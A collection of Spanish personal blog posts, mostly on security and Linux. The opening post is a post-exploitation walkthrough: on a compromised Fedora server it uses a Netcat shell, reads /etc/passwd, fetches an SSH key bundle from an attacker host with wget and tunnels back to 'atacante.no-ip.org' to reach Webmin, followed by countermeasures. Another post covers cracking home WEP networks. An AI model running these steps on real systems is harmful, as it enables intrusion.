Después de varias horas de verlo hacerse de la mala ceja se me ocurrieron varios puntos donde se podían hacer ataques:

Escenario

1. Servidor Web con Linux Fedora Core 3, obviamente con instalación por defecto
2. Servidor “protegido” por un FW Checkpoint.
1. Que nos bloquea la IP cada vez que hacemos un escaneo de puertos.
2. No tiene ACLs de salida del servidor, are you thinking what I am thinking?
   
3. Se ha logrado comprometer el servidor
1. Se tiene una shell creada por el php shell y que a su vez se ha conseguido otra con el Netcat conectándonos a nuestra máquina desde la máquina vícitma. Total el FW no tiene ACLs que bloqueen la salida de tráfico del servidor.
2. Tiene un IP Privada del otro lado, así que podemos suponer que están haciendo el port Forwarding al puerto 443.
3. Tiene el Webmin habilitado >:) pero bloqueado por el FW :’(

Planteamiento

¿Qué sigue? Obviamente escalar privilegios, encontrar mas servidores dentro de la DMZ y/o conseguir contraseñas. Ya se sacaron los usuarios con el comando cat /etc/passwd pero los hashes de las contraseñas  no ya que no disponemos de privilegios de root y hacer el viejo truco con Hydra de probar el mismo usuario y contraseñas contra un servicio es inútil por el FW.

¿Cómo podemos sopesar este problema? Como sabemos, el Webmin es una herramienta poderosísima para la admnistración del servidor pero cuenta con un sin fín de vulnerabilidades que, aunque son parchadas con cierta rapidez, si la instalación es por default o está sin administrar (abandonada) se puede comprometer la integridad del servidor con cierta facilidad.

Jutsu

  Creo que habemos pocos que conocemos los oscuros secretos y milenarias técnicas del SSH y los ocupamos con cierta regularidad. Aqui explico mi prueba de concepto para alcanzar el puerto de Webmin y poder comprometerlo:

Necesitamos tener una cuenta en una máquina y pueda acceder al servicio de SSH. Para esto podemos usar el Backtrack creamos una cuenta sin mayores privilegios. Dentro de esta cuenta creamos una llave pública de ssh para poder automatizar la autenticación y no perder la shell dentro del servidor:

# Creamos el directorio donde guardaremos la configuracion
mkdir ~/.ssh
# Creamos la llave sin contraseña para que sea mas cómoda de usar
ssh-keygen -t dsa
# Nos crea dos archivos que son la llave pública y la privada
id_dsa id_dsa.pub
# Renombramos la pública para poder usarla como autenticación
mv id_dsa.pub authorized_keys

Ahora creamos el siguiente archivo config:

Host atacante
# La IP o nombre de dominio que estamos usando
Hostname atacante.no-ip.org
RemoteForward 10000 127.0.0.1:10000
# Puerto que tengamos abierto y con el servicio de SSH corriendo
Port 1025
# El usuario que hallamos creado
User tunel
BatchMode yes
Compression yes
# La llave privada que no debe contener contraseña y nos dará acceso al usuario tunel
IdentityFile /tmp/.ssh/id_dsa
CompressionLevel 9
# Con esto nos saltamos el que nos pregunte que si añade la llave rsa al archivo.
StrictHostKeyChecking no
PubkeyAuthentication yes
UserKnownHostsFile /tmp/.ssh/known_hosts

Ahora subimos el archivo al servidor como tarball. Lo podemos hacer con la herramienta woof.

# En el lado del atacante
woof -p [PuertoAlcanzable] -i [IP] ~/.ssh

# En el lado de la victima
cd /tmp
wget [URL Cambiando la IP por la IP pública] -O - | tar zxvf -
cd .ssh
chmod 0600 *
ssh-agent bash
ssh-add
ssh -fNF config atacante

Recuerda que si estas detrás de un dispositivo que haga NAT debes hacer reenvío de puerto de forma que podamos alcanzar la máquina del atacante desde la máquina víctima y que el URL que le ingresaremos en el wget no es la IP privada sino la IP pública que tiene nuestro router. Los que tenemos cableacces estamos jodidos pero siempre podemos usar un servidor prestado que tenga una IP Pública XD.

Y si todo sale bien nos devolverá la línea de comando y veremos un proceso parecido al este:

ps ax | grep -i ssh
28659 ? Ss 0:30 ssh -fNF config atacante

Bien, ahora desde la máquina del atacante deberemos ver unos puertos parecidos a esto:

sudo netstat -ptuna | grep -i listen
tcp 0 0 127.0.0.1:10000 0.0.0.0:* LISTEN -

Perfecto! Si hasta ahora todo ha salido bien podremos entrar a la consola de administración del Webmin desde el navegador usando la siguiente URL: https://localhost:10000.

Nos vamos a la siguiente página y descargamos el exploit:

http://securitydot.net/xpl/exploits/vulnerabilities/articles/1164/exploit.html en Perl
http://www.milw0rm.com/exploits/1997 en PHP

Contramedidas

1. No instalas ningun aplicativo que no piensas dar mantenimiento en un servidor de producción.
2. Aparte del firewall corporativo es saludable instalar un firewall de host que proteja la máquina así la administración del FW queda en tus manos y no dependes de un tercero que no sabes que políticas maneja. APF es mi recomendación.
3. En los ACLs del firewall es buena idea bloquear cual tráfico que salga del servidor que no sea de tipo ESTABLISHED o que vaya única y exclusivamente a los servidores de actualizaciones, por este motivo es bueno tener un sistema de actualización local como el WSUS para Haselfroch.
4. Siempre, y repito, siempre has un hardeneo de tus servidores de producción, quita servicios que no uses y aquellos que necesitas pero son inseguros (Webmin, VNC) puedes hacer que escuchen localmente y accederlos por túneles de SSH.
5. Mantén un procedimiento para verificar la integridad de tus servidores como Tripwire.
6. Mantén una política de contraseñas complejas en tus usuarios, así, aúnque consigan los hashes de la contraseñas el romperlas puede llegar a ser virtualmente imposible.
7. Mantén actualizado tu sistema y las aplicaciones que tenga dentro, realiza auditorias constantes sobre tus aplicaciones Web para ver posibles agujeros de seguridad que puedan comprometer tu servidor. Para esto existen aplicaciones como GFI Languard y Nessus.

Aún siguiendo estos pasos no puedes ganrantizar que estará seguro tu servidor, siempre habrá una nueva vulnerabilidad o alguien que consiga brincarse la barda que has puesto. Hacer seguridad y cumplir al menos con las buenas prácticas de administración de servidores permiten mitigar los ataques que puedas recibir y que puedan afectar al negocio.

Tags: Seguridad, firewall, webmin, Secure Shell, SSH, Apache

Durante este trayecto la gente adecuada apareció en mi vida. Gente como Zita y Alejandro que han sido unos padres sustitutos excelsos, la Chica Moreno, un ángel que Dios me mandó para darme siempre esperanza, Débora Rángel que gracias a su ética profesional y su intervención me mantuvo, sino cuerdo, no tan loco vovléndose una luz en ese camino oscuro en el que estuve metido un buen rato.

No podemos dejar atrás a gente tan importante como: Cachabeto que me enseñó la ligereza de la vida, Rodoom que me mostró la integridad del creer en algo y llevarlo a su máxima expresión, Shendira Reyes cuyas frases como “Recuerda lo que dijo Séneca* me llenaron mas de una vez de claridad en mi momento mas confuso, Alejandro Cacho, el único ser que podría llamar “hermano mayor” y siempre ha tenido mucho para enseñarme. No olvidemos a aquel grupo de paracaidístas que aparecieron un día en mi cubículo para no irse por casi 3 años: Pitufo, de corazón calmado que siempre pudo colocarme en mi lugar cuando cuando estaba por tomar una decisión con el estómago, Wera del que he aprendido que la vida es de los intrépidos y se come a mordidas grandes y nunca con cubiertos. Poison, que me ha enseñado que se se debe vivir divertido, con nobleza y lealtad, BigDaddy, que me ha enseñado que la visión a futuro siempre puede ir acompañada de una sonrisa. Fonseca, ese hombre que me ha demostrado que el trabajo duro y bien hecho simpre trae sus recompensas, Benito, que siempre ve el vaso medio lleno y puede convencerte de que ello. Israel que me enseñó que uno siempre puede cambiar y siempre hay un rayito de sol para cada uno, Jess, una de las mujeres mas chingonas que conozco, Omigoto, que siempre ha tenido una anéctoda que me sorprenda, Gerardo Alvarez, uno de los g33ks mas brillantes que me he topado, Carlos Manjarrez que me demuestra que para los negocios se puede tener cerebro y músculo, Sonia, una de las almas mas libres e inspiradoras que conozco, Sofía, un huracán imparable cuando de alcanzar metas se trata, gente con una gran genialidad como Alejandra Escobar, Martha Escárcega, Alejandro Cornejo y Angel Almada, exponentes máximos de la frase “el que quiere puede y los límites están en uno mismo”.

Entre los mas viejos que puedo nombrar en mi vida está mi hermano Orlando que siempre ha tenido el otro remo en este barquito que compartimos, Vanessa, mi prima, que se ha vuelto una fuente interminable de motivación y Fabiola, mi novia, que si existiera algo así como alma gemela ella tendría que ser la mía.

¿Que cómo fue estudiar en el ITAM? Fue horrible, frustrante y enagenante oseáse: ESPANTOSO pero gracias a ese trol gigante  pude medirme, conocer mi temple y saber hasta dónde puedo llegar cuando me lo propongo. Pocos profesores puedo recordar con cariño y decir que hicieron una diferencia en mi vida: Ana Lidia Franzoni, Carlos Zozaya, Armando Maldonado, Rafael Gamboa, José Incera, Uciel Fragoso, Alfredo Villafranca y Silvia Guardati. Gracias a cada uno por su dedicación en mi formación.

En fin, ya me gradué, me falta la titulación pero ello es sólo trámite. Sobre lo malo, ese lo olvido y me quedo con esos “casi 3 años” en el cubículo de Salas de Servidores, con la compañía, los debrayes, los sueños y las risas. Lo demás ya no tiene relevancia.

Adrian Puente Z.

* Cuando mi madre falleció la vida para mi era un monstruo gigantezco que apenas podía mantener a raya, Shen tuvo bien a citar una lectura académica “Dios te manda los retos porque te ama y sabe que los puedes enfrentar, si no te amara simplemente te despreciaría y te daría una vida tan sencilla que no valdría la pena vivirla” Obviamente por el contexto que estaba viviendo casi le miento la madre pero poco a poco he ido entendiendo la expresión y el porqué me lo dijo en ese momento.

Tags: ITAM libertad graduado servibanda

Por ejemplo yo soy mucho de usar el Thunderbird para leer mis correos, el Sunbird para gestionar mis citas, mientras que navego el 99% con el Firefox y chateo con el Gaim, pues todo eso ya está para USB y podemos seguir con nuestas aplicaciones favoritas en cualquier computadora y sincronizar las funcionalidades de las aplicaciones con nuestro sistema base usando Unison o Rsync.

¿Pero qué mas podemos hacer? Ahora con la capacidad de las computadoras de bootear por casi cualquier periférico, que vaya, bootear por red es lo mas viejo del mundo el arrancar por USB es lo de hoy, es cosa de configurar el BIOS para lograr esto.

Pues con la novedad que se pueden arrancar sistemas operativos por USB, “Naaa eso es viejo!!!” me diras pero que tal arrancar un Windows XP desde USB todo montado sobre RAM, pues si, se pueden tener tantos sistemas operativos como quepan en nuestro USB porque ahora hasta se le puede instalar el GRUB al dispositivo.

Salió un nuevo proyecto para crear Live CDs de Windows XP que hasta ahora se ha hecho fácil. Aunque ya han existido proyectos como el ERD Commander de WinInternals recientemente adquirido por Microsoft y el BartPE XPE y creo que hasta hay un Live CD de Windows Vista.

Si pero que onda con correr Sistemas Operativos en el USB y encima arrancar con Grub. Los artículos están realmente interesantes, se los paso al costo:

* miniPE, BackTrack and Knoppix in an USB pen
* Running Hiren’s BootCd 6.0 from Bootable Usb Stick
* Installing Feather Linux to a USB drive

Adrian Puente Z.

Yo soy de la idea de no reinventar el hilo negro sino utilizar de la mejor forma los recursos que existen. En mi experiencia nada cómo usar un Live CD ya sea para recuperación , forencia o pentest. Entre los Linux Live CDs que he probado están:

* Feather Linux
* Damn Small Linux
* Tomsrtbt
* Knoppix
* Helix
* SleuthKit
* Operator
* Backtrack

Pero en realidad hay una gran lista de distribuciones Live CD de donde escoger. Para iniciar comentaré lo que se necesita para el rompimiento de redes inalámbricas:

La verdad es que se puede instalar desde cero la suite de Aircrack-ng pero en caso de que usemos Hasefroch podemos bootear la máquina con un Live CD especializado o cear una máquina de virtual en el VMplayer y una tarjera con el chipset indicado.

* Software

Podemos descargar el Backtrack que ya hoy está en su versión liberada 2
Se necesita el Backtrack o el WifiSlax que es una versión modificada del Backtrack en español y con muchas interfaces configuradas para que no tengamos que teclear el casi nada.

Para crear una máquina virtual podemos usar el VMplayer que es gratuito y creamos la máquina virtual con el vmxbuilder que igualmente no cuesta un peso.

* Hardware

¿Qué tarjeta comprar? Lo importante es el chipset no la tarjeta. En la documentacion de Aircrack que está en inglés y en español y tienen una sección que nos dice cuales son las mejores tarjetas para realizar esto, en mi caso he probado ya varias y hasta hice un articulo al respecto. Las que recomiendo ampliamente de chipset Ralink son:
* DWL-G122
* WUSB54g Version 4

* Tutoriales

En este video explican como crear una máquina virtual sin el VMware, aqui podemos aprender como correr un Live CD en Vmware

Video de como romper Wep con Backtrack 1

Mas videos de Craking WEP y WPA de aircrack y wifislax

* Lo mas nuevo

En lo último que encontré es el nuevo algoritmo para rompimiento de redes llamado aircrack-ptw y el soporte que se le ha dado al chipset Centrino ipw220 y el chipset Broadcom en el Wifislax. Igualmente ya sacaron el Airoscript que es la automatización de la suite aircrack para facilitar todo y se han generado algoritmos y métodos para romper WPA.

* Problemática

En México o al menos en el DF el 80% de los usuarios de internet compran el Kit de Prodigy inalámbrico el cual conectan, configuran y olvidan encontrando sumamente cómodo y chic la red inalámbrica sin estar conscientes de que el algoritmo de cifrado WEP es de 64 bits y la clave hex son 10 números sin letras haciendo sumamente sencillo romper la clave (te laten 10 mins) y entrar a la red del usuario, sí feliz usuario de Prodigy sienta miedo, usted puede estar hosteando a un intruso que ya ha tomado su access point, cambiado contraseña y puede estar realizando técnicas de arp poisoning para capturar su tráfico, contraseñas y hasta tarjetas de banco, porque de seguro tu eres de los que tiene su bancanet y cree que porque tiene SSL es seguro cuando el 90% de los usuarios dan aceptar sin pelar la advertencia del navegador. ¿Eres uno de ellos?

* Contramedidas

Algunas medidas para evitar tener colgado a alguien

* Si no requieres tener red inalámbrica no la pongas.
* Asigna contraseña al Access Point.
* Esconde el ESSID que aún así se puede obtener y cámbiaselo a algo que no diga 2WIRE[HACKME].
* Usa de pérdida WEP de 128, sí puedes WPA aunque los dispositivos mas viejos no lo soportan.
* Filtra las MACs de las máquinas si no tienes demasiadas aunque esto se puede hacer un infierno en grandes redes.
* Cambia seguido la clave WEP y la contraseña del Access Point.
* Revisa tu Access cada que puedas, este logea las máquinas que se han conectado, si ves alguna máquinas desconocida cambia las contraseñas.
* Asigna firewalls personales a tus máquinas y quita carpetas compartidas que no sean necesarias y las que si ponles permisos por grupos o usuarios.
* Ponle contraseñas a los usuarios de las máquinas, al menos al Administrador.

* Conclusión

No hay nada seguro en realidad pero siempre podremos mitigar los ataques teniendo algo de cuidado y propagando una cultura de la seguridad. Alguna vez escuché que si tienes un coche este conlleva responsabilidades como el pago de tenencia y la verificación, con la seguridad es lo mismo, si uno compra un dispositivo uno se arriesga a las vulverabilidades que trae consigo este, el desconocer los medios para protegernos y/o no llevarlos a cabo nos hacen vícitmas potenciales, está en cada uno mitigar estas posibles amenazas.

Adrián Puente Z.

Muchas gracias por llenar mi gran pequeño mundo.

Adrián Puente Z.

Encontré el Tiny Web Gallery que sobrepasó mis expectativas, aparte de que es realmente fácil de utilizar y administrar. ¿No te ha pasado que tienes cientos de pics pero el problema es que hiciste respaldo en multiples directorios en diferentes partes de tu sistema? En fin, hice un script que me automatiza la creación de la galeria escalando las imágenes a 800×600, ordenándolas y etiquetándolos con una leyenda que describa la situación del evento, para muestra un botón:

En mi caso me bajé el XAMPP que es un excelente proyecto de que incluye Apache, PHP 4 o 5 y MySQL extremadamente amigable para administrar. Vamos a descargarlo aqui y seguimos las instrucciones, es importante cambiarle las contraseñas a los servicios de XAMPP para un servidor en producción sino luego no chilles si te cambian la página de inicio. Recuerda que el TWG funciona con PHP4 al menos yo no lo he probado con el PHP5 asi que cambiamos con el siguiente comando:

sudo /opt/lampp/lampp security
sudo /opt/lampp/lampp php4
sudo /opt/lampp/lampp restart


Ahora descargamos el TWG de aqui lo descargamos en /tmp y lo ponemos en la siguiente carpeta /opt/lampp/htdocs. Es importante cambiarle el grupo y darle permisos de escritura al apache pues de otra forma no podremos administar e TWG.

cd /opt/lampp/htdocs/
unzip -a /tmp/twg*.zip
mv twg* galeria
chgrp -R nobody galeria
chmod -R g+w galeria


Listo! ya tenemos instalado el Apache con el PHP4 y el TWG en nuestra máquina y podemos verlo andar en la siguiente direccion http://localhost/galeria . Debes de poder ver la galería de prueba, cosa que queremos pues significa que el “juguete” está andando, después puedes borrar esta galeria para sólo dejar la tuya. Ahora vamos a administrarla, RECUERDA CAMBIAR LOS PERMISOS. entramos a la siguiente dirección http://localhost/galeria/admin/index.php con el usuario admin y la contraseña twg_admin y nos llevará a la primera página de administración donde no exhorta cambiar el passwd cosa que recomiendo ampliamente así como cambiar el login del usuario por defecto por uno menos convencional, ya sabes, vivo en la paranoia.

Para irnos directo: en el menú izquierdo vemos una liga que dice “Configure TWG” la pulsamos y en la opción “Enable session caching of directorys and files” le damos false. Cuando estamos actualizando la galeria es bueno tenerlo en false así regenera el caché y podemos ver la galeria terminada. Cuando acabemos no olvides poner en true esta opción, es mucho mas óptimo tenerlo habilitado cuando ya se encuentra en producción. Las imágenes se guardan en carpetas en la siguiente dirección /opt/lampp/htdocs/galeria/pictures Cada galeria le puedes poner una carpeta y dentro de cada carpeta puedes poner una imagen llamada folder.png para que sea el ícono de la Galeria así como un archivo foldername.txt para la descripción donde puedes poner HTML y hacerlo mas “eye candy“.

Vamos al famoso Script que nos automatizará la tarea de procesamiento de imágenes. Es importente tener el comando convert del Imagemagick. El script doGallery

#!/bin/bash
# Script hecho por Adrian Puente.

if [ $# -lt 2 ]
then
        echo -e "Sintaxis: `basename ${0}` [Prefix Pics] ["Desc"]"
        echo -e "Ejemplo: `basename ${0}` navidad.familia.2007 \"Navidad con la Familia 2007\".\n"
        echo -e "Es importante poner las descripciones con espacios entre comillas."
        echo -e "Terminando el script una carpeta 800x600 contendra las imagenes procesadas."
        exit 0
fi

[ -f PROCESADO.TXT ] && cat PROCESADO.TXT && echo "Borrar el archivo PROCESADO.TXT" && exit 

PREF=${1}
DESC=${2}
OK="\033[5;32;1mHECHO\033[0m"
NO="\033[5;31;1mERROR\033[0m"

[ ! -d 800x600 ] && mkdir 800x600
# Renombramos las pics para mayor comodidad.
CTR=0;
for i in `ls -1 *.jpg *.JPG`
do
        if [ ${CTR} -lt 10 ]
        then
                NUM=00${CTR}
        else if [ ${CTR} -lt 100 ]
        then
                        NUM=0${CTR}
                else
                        NUM=${CTR}
                fi
        fi
        CTR=`expr ${CTR} + 1`
        echo -en "Convirtiendo ${i} --> ${PREF}-${NUM}.jpg "
        convert ${i} -scale 800x600 -fill white \
                     -box \#00000080 -gravity South \
                     -pointsize 25 -annotate +0+5 "${DESC}" \
                     800x600/${PREF}-${NUM}.jpg && echo -e [${OK}] || echo -e [${NO}]
done

echo ${DESC} > 800x600/foldername.txt
echo -e "Directorio procesado para galeria el "`date +%F` > PROCESADO.TXT

El script te crea un archivo foldername.txt con la descripción que escogimos que es compatible con el TWG, también crea un archivo llamado PROCESADO.TXT que guarda la fecha en que esa carpeta fue procesada para no tener múltiples instancias de las carpetas procesadas. Ahora renombramos la carpeta 800×600 con un nombre que describa la situación, no sé, mi_cumple_2007, cuando termino restauro la opción del cache y en mi caso sincronizo los directorios con rsync, así puedo tener la galeria “en desarrollo” en mi máquina y cuando queda como quiero la subo, así tengo respaldo y no consumo el ancho de banda de mi site, ok muy ñoño pero no hay porqué ser ineficientes.

rsync --progress -avz -e ssh /opt/lampp/htdocs/galeria usuario@sitioweb:camino/a/los/htdocs


Si tienes algún problema extraño recuerda los permisos . En mi caso mi usuario y grupo en el sitio web es diferente al que tengo en mi máquina así que es bueno verificar los permisos de los grupos. Si quieres aumentarle la seguridad a tu sitio cambia el nombre de la carpeta admin por algún nombre difícil de adivinary accesa por la misma carpeta /index.php. Listo! la galeria ha sido creada. Enjoy

La galería de este su Blog es: http://www.hackarandas.com/galeria

Adrián Puente Z.

¿Porqué nació esta adicción? Creo que ha sido mi obsesión por encontrar la tarjeta de red perfecta para romper redes inalámbricas entonces me vi envuelto en la modificación (mas bien destrozamiento) de mi tarjeta WUSB54G para añadirle una antena de 9 dbi y me detuve con la frustración de la tarjeta X-Media que nunca me funcionó.

Bueno todo esto viene a que ando escribiendo un artículo de cómo romper redes inalámbricas y entre mis tarjetas que funcionan con el Backtrack y el WifiSlax estos son mis favoritos:

La DWL-G650 de D-Link. La mejor tarjeta que he tenido. Con esta mi récord sobre una red de Prodigy es de 18 mins y si le pones una moneda de 10 pesos aumentas su alcance (por ridículo que suene). El problema es que la tecnología pcmcia está de salida y ya las nuevas laptops no la usan. Lo interesante de esta tarjeta es que tiene chipset Prism que permite la inyección de paquetes. Esta tarjeta la uso en una máquina Pentium con 32 de RAM que sólo tiene Backtrack instalado y funciona de maravilla.

El dispositivo WUSB54G es muy bueno y al ser conectado por USB puedes conectarlo donde sea. Tiene un chipset Ralink que detecta perfectamente el Backtrack como rausb0 y es relativamente barato. En lo que se refiere a inyección de paquetes es muy lento y se llega a trabar por lo que desarrollé un script para que reiniciara la inyección cada X tiempo. Es mi segunda favorita y hay la posibilidad de adaptarle una antena para aumentar su alcance. Yo estoy haciendo el intento pero he descubierto que soy particularmente torpe al usar el cautín destruyendo todo en un rango de metro y medio.

También tengo una vieja latop Averatec que tiene igualmente el chipset Ralink y funciona de maravilla hasta que le troné el procesador por calor. El problema fue que no hallaba quien me la arreglara hasta que hallé al Ingeniero Miguel en la plaza de la computación en lel piso de arriba en el local 62 por la zona de comida. Me eché la laptop al intentar reconstruirle el cargador y genero mal la corriente aparte de que un ventilador le falló y ya no enfriaba. Ahora le compré una de esas bases con ventiladores.

Al parecer el chipset Centrino tiene la capacidad para inyectar paquetes y poder romper redes usando el aireplay-ng parchado que ya trae Wifislax. La verdad es un maquinón y a diferencia de otras personas Dell nunca me ha dado problemas, en fin… de todas formas es la máquina de la oficina.

Ya para terminar a mi chica le compré una tarjeta de red Encore muy muy barata y muy muy buena. Normalmente la calidad del hardware es proporcional al precio pero esta tarjeta realmente rompió con los esquemas, hasta ha funcionado mejor que otras que son mas caras y se ven mas finas. Por otro lado compré 2 tarjetas XMedia y ambas tienen chipset Ralink pero aún asi no le ganaron a la tarjeta Encore. Por otro lado la tarjeta XMedia IT-WL542 tiene Chipset Ralink y la detecta el Bactrack 2 Final la echó a andar y duró como 5 mins funcionando pero de ahi en fuera ni Ubuntu ni Debian me la detectaron bien. La verdad no la recomiendo para Linux aunque está muy barata la tarjeta ya para Hasefroch es otra historia.

Por lo pronto tengo que encontrarle un bonito hogar al montón de tarjetas que realmente no utilizo y tratar de contenerme mas pues me hace mas falta ropa que hardware. ¿Alguien está interesado en una tarjeta pcmcia bla?

Adrián Puente Z.

Sacas cuanto disco de recuperación tienes: Ubuntu Live, Ubuntu Alternate, Knoppix, Hiren’s, Techiez y los vas probando uno a uno sin mucho éxito, después de hora y media recuerdas un disco de antaño que tenía cierto script de restauración… mmm si, ¿cual era? y te echas un clavado entre tus torres de discos y sacas, cual buzo saca un doblón español del navío hundido, el disco de Viva Linux (muy buena distro, por cierto) booteas y cual arte de magia restauras el grub… de haberte acordado antes :S

Bueno, en fin… nuevamente a la ceremonia pro tésis,booteas, te logeas e ingresas al sistema intentas recordar dónde te quedaste, abres tu editor de latex ¡¡pero no puedes trabajar en tal chiquero!! tantos archivos temporales, borrémos a esas malditas sabandijas…


--.^ (apuente@TEST5)*(21:44:07)*(tesis_completa) ^.--
-=:)> rm -vfr * ~
removed `agradecimientos.tex'
removed `Cap01.tex'
removed `Cap02.tex'
removed `Cap03.tex'
removed `Cap04.tex'
removed `Cap05.tex'
removed `Cap06.tex'
removed `Cap07.tex'
.....
removed `/home/apuente/Examples'
removed `/home/apuente/.Xauthority'
removed `/home/apuente/.evolution/calendar/config/TaskPad'
removed `/home/apuente/.evolution/calendar/config/index_images-00.html'
removed `/home/apuente/.evolution/calendar/config/.sizecache'
removed directory: `/home/apuente/.evolution/calendar/config'
removed `/home/apuente/.evolution/calendar/local/system/calendar.ics'
.....


De pronto un sudor frío te recorre la espalda, contienes la respiración y casi puedes sentir como se dilatan tus pupilas… acabas de hacer una GRAN PENDEJADA y te das cuenta cómo un caracter tan insignificante como el espacio puede hacer la diferencia (no sólo has borrado tu tésis sino todos tus archivos de tu directorio base)… Desesperado intentas recordar cierto artículo de forencia y de cómo recuperar tus archivos, recuerdas cierta herramienta que recupera ext3 pero sólo corre en Windows y maldices tu terquedad por sólo usar Linux mientras extrañas tu partición con WinXP que acabas de formatear y llenar con MP3s, googleas y googleas durante horas, intentas trucos como el debugfs, recover, unrm, magicrescue, grep, strings y NADA. De pronto entre las líneas del Google ves una liga que te llama la ateción y la pulsas:

Q: How can I recover (undelete) deleted files from my ext3 partition?

Actually, you can’t! This is what one of the developers, Andreas Dilger, said about it:

In order to ensure that ext3 can safely resume an unlink after a crash, it actually zeros out the block pointers in the inode, whereas
ext2 just marks these blocks as unused in the block bitmaps and marks the inode as “deleted” and leaves the block pointers alone.

Your only hope is to “grep” for parts of your files that have been deleted and hope for the best.

Sin más que discutir cierras el sistema y te das cuenta que haz perdido 6 horas, no sólo no haz tocado tu tésis sino la haz destruido con quien sabe cuantos archivos invaluables, tus scripts, fotos y el útimo respaldo tiene mas de 8 meses… ni qué decir, es uno de esos dias que no encuentras disparatado poner tu franquicia de Helados Santa Clara y mandar a la chingada la informática…

Adrián Puente Z.

Si, Mr Glade, tú sabes quién eres y te regodeas en tu crapulencia mientras portas con orgullo tu estandárte. Tú que eres aquél que desaloja el elevador de la biblioteca en segundos o destruyes el silencio del cuarto mas amplio de una sola estocada. Porque eres un buen amigo, una vez mas la tecnología avanza y busca la manera de reintegrarte a la sociedad como el ser útil y agradable que eres. Este producto está pensado en ti y lo encuentro aún mas útil que el silbato que alguna vez se anunciara en los juguetes Radioactivos.

Aunque este post es grotesco no podía dejar de aprovechar la genialidad ajena para dedicarte el homenaje que mereces, tú que siempre tuviste la capacidad de sacarme de mis casillas con tus super poderes y técnicas de guerrilla cómo las pruebas de estrés…

Adrián Puente Z.

ascii2hex.pl

#!/usr/bin/perl
# Script editado por Adrian Puente Z.

use strict;
use warnings;

if ( $#ARGV == -1 )
{
        print "Sintaxis: ascii2hex.pl [cadena ASCII]\n";
        exit;
}

my $testchars = $ARGV[0];
my $hexchars = '';
foreach my $c (split(//,$testchars)) {
        $hexchars .= sprintf "%x", ord($c);
}
print "$hexchars\n";

Este Script hace lo contrario pero con otra aproximación:

hex2ascii.pl

#!/usr/bin/perl
# Script editado por Adrian Puente Z.

use strict;
use warnings;

if ( $#ARGV == -1 )
{
        print "Sintaxis: hex2ascii.pl [cadena HEX]\n";
        exit;
}

my $s = $ARGV[0];
$s =~ s/://g;
$s =~ s/ //g;
my $l=length $s;
my @a=pack "H$l",$s;
print "@a\n"

El truco del hex2ascii es que cuando tienes una cadena de tipo AE:34:DF:12 quita los caracteres : y lo convierte con la función pack de perl. Es cosa de checar la documentación para poder cambiar de otros formatos como binario a ASCII o HEX.

Ah, y no, no significan nada en ASCII, los que yo encontré. Normalmente en los routers 2WIRE de Prodigy tienen una clave en la parte inferior del dispositivo que, por lo que he visto, son siempre números facilitando mucho el rompimiento de la llave de la red.

Adrián Puente Z.